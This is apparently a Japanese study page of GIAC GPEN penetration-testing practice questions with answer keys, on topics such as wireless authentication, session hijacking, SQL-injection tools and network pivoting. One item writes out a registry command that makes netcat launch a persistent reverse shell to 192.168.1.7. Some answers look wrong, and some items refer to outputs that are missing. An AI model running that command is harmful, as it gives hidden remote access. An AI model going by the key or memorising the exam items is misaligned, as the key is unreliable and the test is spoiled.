[2024年06月12日]GPEN究極な学習ガイド [Q236-Q260]

[2024年06月12日]GPEN究極な学習ガイド

究極なガイドで準備GPEN認定試験GIAC Information Securityは2024年更新

質問 # 236
Which of the following tools monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools?

• A. Snort
• B. IDS
• C. WIPS
• D. Firewall

正解：C

質問 # 237
Mark works as a Network Administrator for NetTech Inc. The company has a Windows 2003 Active Directory domain-based network. The domain consists of a domain controller, two Windows 2003 member servers, and one hundred client computers. The company employees use laptops with Windows XP Professional. These laptops are equipped with wireless network cards that are used to connect to access points located in the Marketing department of the company. The company employees log on to the domain by using a user name and password combination. The wireless network has been configured with WEP in addition to 802.1x. Mark wants to provide the best level of security for the kind of authentication used by the company. What will Mark do to accomplish the task?

• A. Use IPSec
• B. Use EAP-TLS
• C. Use MD5
• D. Use PEAP

正解：D

質問 # 238
All of the following are advantages of using the Metasploitpriv module for dumping hashes from a local Windows machine EXCEPT:

• A. Doesn't require SMB or NetBIOS access to the target machine
• B. Can run inside of a process owned by any user
• C. LSASS related reboot problems aren't an Issue
• D. Provides less evidence for forensics Investigators to recover

正解：D

解説：
Section: Volume A

質問 # 239
The employees of EWS Inc. require remote access to the company's Web servers. In order to provide solid wireless security, the company uses EAP-TLS as the authentication protocol. Which of the following statements are true about EAP-TLS?
Each correct answer represents a complete solution. Choose all that apply.

• A. It provides a moderate level of security.
• B. It uses password hash for client authentication.
• C. It uses a public key certificate for server authentication.
• D. It is supported by all manufacturers of wireless LAN hardware and software.

正解：C、D

質問 # 240
Which of the following statements are true about session hijacking?
Each correct answer represents a complete solution. Choose all that apply.

• A. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.
• B. TCP session hijacking is when a hacker takes over a TCP session between two machines.
• C. Use of a long random number or string as the session key reduces session hijacking.
• D. It is used to slow the working of victim's network resources.

正解：A、B、C

質問 # 241
Which of the following best explains why you would warn to clear browser slate (history. cache, and cookies) between examinations of web servers when you've been trapping and altering values with a non- transparent proxy?

• A. Values trapped and stored in the browser will reveal the techniques you've used toexamine the web servers.
• B. Trapping and changing response values is beneficial for web site testing but willcause browser instability if not cleared.
• C. Values trapped and changed in the proxy, such as a cookie, will be stored by thebrowser and may impact further testing.
• D. Trapping and changing response values is beneficial for web site testing but usingthe same cached values in your browser will prevent you from being able to changethose values.

正解：C

質問 # 242
Analyze the excerpt from a packet capture between the hosts 192.168.116.9 and 192.168.116.101. What factual conclusion can the tester draw from this output?

• A. Ports 139 and 135 are open.
• B. Pons 135 and 139 are filtered.
• C. Port 135 is filtered, port 139 is open.
• D. Port 139 is closed, port 135 is open

正解：A

解説：
Section: Volume A

質問 # 243
A client with 7200 employees in 14 cities (all connected via high speed WAN connections) has suffered a major external security breach via a desktop which cost them more than SI 72.000 and the loss of a high profile client. They ask you to perform a desktop vulnerability assessment to identify everything that needs to be patched. Using Nessus you find tens of thousands of vulnerabilities that need to be patched. In the report you find workstations running several Windows OS versions and service pack levels, anti-virus software from multiple vendors several major browser versions and different versions of Acrobat Reader.
Which of the following recommendations should you provide with the report?

• A. The client should hire more people to catch up on patches
• B. The client should perform monthly vulnerability assessments
• C. The client should eliminate workstations to reduce workload
• D. The client should standardize their desktop software

正解：A

質問 # 244
You work as a Network Administrator for McNeil Inc. The company has a Windows Active Directory-based single domain single forest network. The functional level of the forest is Windows Server 2003. The company's management has decided to provide laptops to its sales team members. These laptops are equipped with smart card readers. The laptops will be configured as wireless network clients. You are required to accomplish the following tasks:
The wireless network communication should be secured.
The laptop users should be able to use smart cards for getting authenticated.
In order to accomplish the tasks, you take the following steps:
Configure 802.1x and WEP for the wireless connections.
Configure the PEAP-MS-CHAP v2 protocol for authentication.
What will happen after you have taken these steps?

• A. None of the tasks will be accomplished
• B. The laptop users will be able to use smart cards for getting authenticated.
• C. The wireless network communication will be secured.
• D. Both tasks will be accomplished.

正解：C

質問 # 245
Which protocol would need to be available on a target in order for Nmap to identify services like IMAPS and POP3S?

• A. HTTPS
• B. LDAP
• C. SSL
• D. TLS

正解：A

解説：
Reference:
http://nmap.org/book/vscan.html

質問 # 246
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are-secure.com. He has to ping 500 computers to find out whether these computers are connected to the server or not. Which of the following will he use to ping these computers?

• A. TRACEROUTE
• B. PING
• C. NETSTAT
• D. Ping sweeping

正解：D

質問 # 247
You want to use a Windows-based GUI tool which can perform MITM attacks, along with sniffing and ARP poisoning. Which of the following tools will you use?

• A. Brutus
• B. Nmap
• C. Cain and Abel
• D. Dsniff

正解：C

解説：
Section: Volume B

質問 # 248
Which of the following can be used as a countermeasure against the SQL injection attack?
Each correct answer represents a complete solution. Choose two.

• A. Prepared statement
• B. mysql_real_escape_string()
• C. mysql_escape_string()
• D. session_regenerate_id()

正解：A、B

解説：
Section: Volume B

質問 # 249
Which of the following is a person-to-person attack in which an attacker convinces the target that he or she has a problem or might have a certain problem in the future and that he, the attacker, is ready to help solve the problem?

• A. Vulnerability scanning
• B. Social engineering
• C. Reverse social engineering
• D. Dumpster diving

正解：C

質問 # 250
Analyze the command output below. What information can the tester infer directly from the information shown?

• A. The administrator account has no password
• B. The target host is running Linux with Samba services
• C. Account lockouts must be reset by the Administrator
• D. Null sessions are enabled on the target

正解：B

質問 # 251
Which of the following attacks allows the bypassing of access control lists on servers or routers, and helps an attacker to hide?
Each correct answer represents a complete solution. Choose two.

• A. IP spoofing attack
• B. DNS cache poisoning
• C. MAC spoofing
• D. DDoS attack

正解：A、C

質問 # 252
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

• A. You want to put Netcat in the stealth mode.
• B. You want to add the Netcat command to the Windows registry.
• C. You want to set the Netcat to execute command any time.
• D. You want to perform banner grabbing.

正解：A、B、C

解説：
Section: Volume C

質問 # 253
Which of the following statements are true about WPA?
Each correct answer represents a complete solution. Choose all that apply.

• A. WPA-PSK requires a user to enter an 8-character to 63-character passphrase into a wireles s client.
• B. Shared-key WPA is vulnerable to password cracking attacks if a weak passphrase is used.
• C. WPA provides better security than WEP.
• D. WPA-PSK converts the passphrase into a 256-bit key.

正解：A、B、C、D

質問 # 254
You have received a file named new.com in your email as an attachment. When you execute this file in your laptop, you get the following message:
'EICAR-STANDARD-ANTIVIRUS-TEST-FILE!'
When you open the file in Notepad, you get the following string:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
What step will you take as a countermeasure against this attack?

• A. Do nothing.
• B. Clean up your laptop with antivirus.
• C. Traverse to all of your drives, search new.com files, and delete them.
• D. Immediately shut down your laptop.

正解：A

質問 # 255
Which of the following tools is an automated tool that is used to implement SQL injections and to retrieve data from Web server databases?

• A. Stick
• B. Fragroute
• C. Absinthe
• D. ADMutate

正解：C

解説：
Section: Volume B

質問 # 256
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using the Linux operating system. He wants to use a wireless sniffer to sniff the We-are-secure network. Which of the following tools will he use to accomplish his task?

• A. WEPCrack
• B. Kismet
• C. NetStumbler
• D. Snadboy's Revelation

正解：B

質問 # 257
Which of the following event logs contains traces of brute force attempts performed by an attacker?

• A. AppEvent.Evt
• B. WinEvent.Evt
• C. SysEvent.Evt
• D. SecEvent.Evt

正解：D

解説：
Section: Volume D

質問 # 258
You have gained shell on a Windows host and want to find other machines to pivot to, but the rules of engagement state that you can only use tools that are already available. How could you find other machines on the target network?

• A. Use the "net share" utility to see who is connected to local shared drives.
• B. Use the "ping" utility in a for loop to sweep the network.
• C. Use the "ping" utility to automatically discover other hosts
• D. Use the "edit" utility to read the target's HOSTS file.

正解：B

解説：
Reference:
http://www.slashroot.in/what-ping-sweep-and-how-do-ping-sweep

質問 # 259
Which of the following IEEE standards defines Wired Equivalent Privacy encryption scheme?

• A. 802.11a
• B. 802.11g
• C. 802.11b
• D. 802.15

正解：C

解説：
Section: Volume D

質問 # 260
......

GIAC Information Security基礎問題GPEN試験練習問題集：https://www.jpntest.com/shiken/GPEN-mondaishu

リアルGPEN問題集でGIAC明確な解答を試そう：https://drive.google.com/open?id=1o9B-RKumizBoXx7NC77SgRxshG8hgVz6